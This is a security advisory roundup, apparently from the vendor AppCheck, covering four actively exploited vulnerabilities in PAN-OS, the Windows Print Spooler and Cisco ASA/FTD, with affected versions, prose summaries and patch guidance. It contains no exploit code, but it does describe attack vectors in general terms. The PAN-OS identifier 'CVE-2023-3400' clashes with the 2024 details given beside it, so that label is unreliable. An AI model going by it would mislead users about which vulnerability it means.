This article covers recent vulnerabilities found to be actively exploited. They are categorised based not only on the category of exploitation, but their impact, and versions affected. This article also informs on any official fix and remediation guidance for the listed vulnerabilities.

CVE-2023-3400

Category: Command Injection

Versions Affected:

• PAN-OS 10.2 prior to release 10.2.9-h1
• PAN-OS 11.0 prior to release 11.0.4-h1
• PAN-OS 11.1 prior to release 11.1.2-h3

(Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.)

Vulnerability Summary:

A command injection vulnerability exists in the GlobalProtect feature of Palo Alto Networks PAN-OS software with the configurations for both GlobalProtect gateway and device telemetry enabled. The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. This could allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage.

Official Fix & Remediation Guidance:

• Users of affected devices should enable Threat Prevention Threat ID 95187 if that is available, otherwise, disable device telemetry until patches are available from the vendor, per vendor instructions.
• Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Once patches become available, customers are advised to upgrade to the latest version of the impacted product.

NOTE: Remediation of this vulnerability by patching to a specific version indicated may not be sufficient to secure the product against further vulnerabilities discovered in later versions, subsequent to the publication of this guidance. Unless contra-indicated, customers are therefore advised to always upgrade to the latest version of the product available.

CVE-2022-38028

Category: Dynamic Loading & Untrusted Search Path

Versions Affected:

Affected Products (Desktop Operating Systems):

• Microsoft Windows 8.1 for x64-based systems prior to release 6.3.9600.20625 6.3.9600.20625
• Microsoft Windows 8.1 for 32-bit systems prior to release 6.3.9600.20625
• Microsoft Windows 10 Version 1607 for x64-based Systems prior to release 10.0.14393.5427
• Microsoft Windows 10 Version 1607 for 32-bit Systems prior to release 10.0.14393.5427
• Microsoft Windows 10 for x64-based Systems prior to release 10.0.10240.19507
• Microsoft Windows 10 for 32-bit Systems prior to release 10.0.10240.19507
• Microsoft Windows 10 Version 21H1 for 32-bit Systems prior to release 10.0.19043.2130
• Microsoft Windows 10 Version 1809 for 32-bit Systems prior to release 10.0.17763.3532
• Microsoft Windows 10 Version 20H2 for ARM64-based Systems prior to release 10.0.19042.2130
• Microsoft Windows 10 Version 20H2 for 32-bit Systems prior to release 10.0.19042.2130
• Microsoft Windows 10 Version 21H1 for ARM64-based Systems prior to release 10.0.19043.2130
• Microsoft Windows 10 Version 21H1 for x64-based Systems prior to release 10.0.19043.2130
• Microsoft Windows 10 Version 1809 for ARM64-based Systems prior to release 10.0.17763.3532
• Microsoft Windows 10 Version 1809 for x64-based Systems prior to release 10.0.17763.3532
• Microsoft Windows 10 Version 21H2 for x64-based Systems prior to release 10.0.19044.2130
• Microsoft Windows 10 Version 21H2 for ARM64-based Systems prior to release 10.0.19044.2130
• Microsoft Windows 10 Version 21H2 for 32-bit Systems prior to release 10.0.19044.2130
• Microsoft Windows 11 Version 22H2 for x64-based Systems prior to release 10.0.22621.674
• Microsoft Windows 11 Version 22H2 for ARM64-based Systems prior to release 10.0.22621.674
• Microsoft Windows 11 version 21H2 for ARM64-based Systems prior to release 10.0.22000.1098
• Microsoft Windows 11 version 21H2 for x64-based Systems prior to release 10.0.22000.1098

Affected Products (Server Operating Systems):

• Microsoft Windows Server 2012 R2 (Server Core installation) prior to release 6.3.9600.20625
• Microsoft Windows Server 2012 R2 prior to release 6.3.9600.20625
• Microsoft Windows Server 2012 prior to release 6.2.9200.23920
• Microsoft Windows Server 2012 (Server Core installation) prior to release 6.2.9200.23920
• Microsoft Windows Server 2016 (Server Core installation) prior to release 10.0.14393.5427
• Microsoft Windows Server 2016 prior to release 10.0.14393.5427
• Microsoft Windows Server 2019 (Server Core installation) prior to release 10.0.17763.3532
• Microsoft Windows Server 2019 prior to release 10.0.17763.3532
• Microsoft Windows Server 2022 prior to release 10.0.20348.1129
• Microsoft Windows Server 2022 (Server Core installation) prior to release 10.0.20348.1129

Affected Products (Mobile Operating Systems):

• Microsoft Windows RT 8.1 prior to release 6.3.9600.20625

Vulnerability Summary:

A security issue has been identified in the Microsoft Windows Print Spooler component. An attacker can modify a JavaScript constraints file and execute it with SYSTEM-level permissions. The vulnerability is believed to potentially relate to improper sanitisation and normalization of filenames to pass in arbitrary (malicious) libraries via DLL injection.

The product searches for critical resources using an externally-supplied search path that can point to resources that are not under the product’s direct control. This might allow attackers to execute their own programs, access unauthorized data files, or modify configuration in unexpected ways. If the product uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted product would then execute.

This component has previously been the target of similar vulnerabilities known as “PrintNightmare”, in related CVE ID reference CVE-2021-34527.

Official Fix & Remediation Guidance:

Anyone administering Windows machines should ensure that the fix for CVE-2022-38028 has been installed, as well as the fix for CVE-2021-34527, the tracking designation for a previous critical zero-day that came under mass attack in 2021.

Microsoft released a security update for the Print Spooler vulnerability exploited by GooseEgg on October 11, 2022 – see https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security.

NOTE: Remediation of this vulnerability by patching to a specific version indicated may not be sufficient to secure the product against further vulnerabilities discovered in later versions, subsequent to the publication of this guidance. Unless contra-indicated, customers are therefore advised to always upgrade to the latest version of the product available.

CVE-2024-20359

Category: Privilege Escalation

Versions Affected:

• Cisco ASA (awaiting full list of impacted versions from vendor)
• Cisco FTD (awaiting full list of impacted versions from vendor)

Vulnerability Summary:

A vulnerability in a legacy capability that allowed for the preloading of VPN clients and plug-ins and that has been available in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit this vulnerability.

This vulnerability is due to improper validation of a file when it is read from system flash memory. An attacker could exploit this vulnerability by copying a crafted file to the disk0: file system of an affected device.

Official Fix & Remediation Guidance:

Cisco has released software updates that address this vulnerability. Customers are advised to upgrade to the latest version of the impacted product.

To upgrade to a fixed release of Cisco FTD Software, customers can do one of the following:

• For devices that are managed by using Cisco Firepower Management Center (FMC), use the FMC interface to install the upgrade. After installation is complete, reapply the access control policy.
• For devices that are managed by using Cisco Firepower Device Manager (FDM), use the FDM interface to install the upgrade. After installation is complete, reapply the access control policy.

NOTE: Remediation of this vulnerability by patching to a specific version indicated may not be sufficient to secure the product against further vulnerabilities discovered in later versions, subsequent to the publication of this guidance. Unless contra-indicated, customers are therefore advised to always upgrade to the latest version of the product available.

CVE-2024-20353

Category: Denial of Service (DOS)

Versions Affected:

• Cisco ASA (awaiting full list of impacted versions from vendor)
• Cisco FTD (awaiting full list of impacted versions from vendor)

Vulnerability Summary:

Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an infinite loop vulnerability. This vulnerability is due to incomplete error checking when parsing an HTTP header. An attacker could exploit this vulnerability by sending a crafted HTTP request to a targeted web server on a device.

Official Fix & Remediation Guidance:

Cisco has released software updates that address this vulnerability. Customers are advised to upgrade to the latest version of the impacted product.

To upgrade to a fixed release of Cisco FTD Software, customers can do one of the following:

• For devices that are managed by using Cisco Firepower Management Center (FMC), use the FMC interface to install the upgrade. After installation is complete, reapply the access control policy.
• For devices that are managed by using Cisco Firepower Device Manager (FDM), use the FDM interface to install the upgrade. After installation is complete, reapply the access control policy.

NOTE: Remediation of this vulnerability by patching to a specific version indicated may not be sufficient to secure the product against further vulnerabilities discovered in later versions, subsequent to the publication of this guidance. Unless contra-indicated, customers are therefore advised to always upgrade to the latest version of the product available.

About AppCheck

AppCheck is a software security vendor based in the UK, offering a leading security scanning platform that automates the discovery of security flaws within organisations websites, applications, network, and cloud infrastructure. AppCheck are authorized by the Common Vulnerabilities and Exposures (CVE) Program as a CVE Numbering Authority (CNA).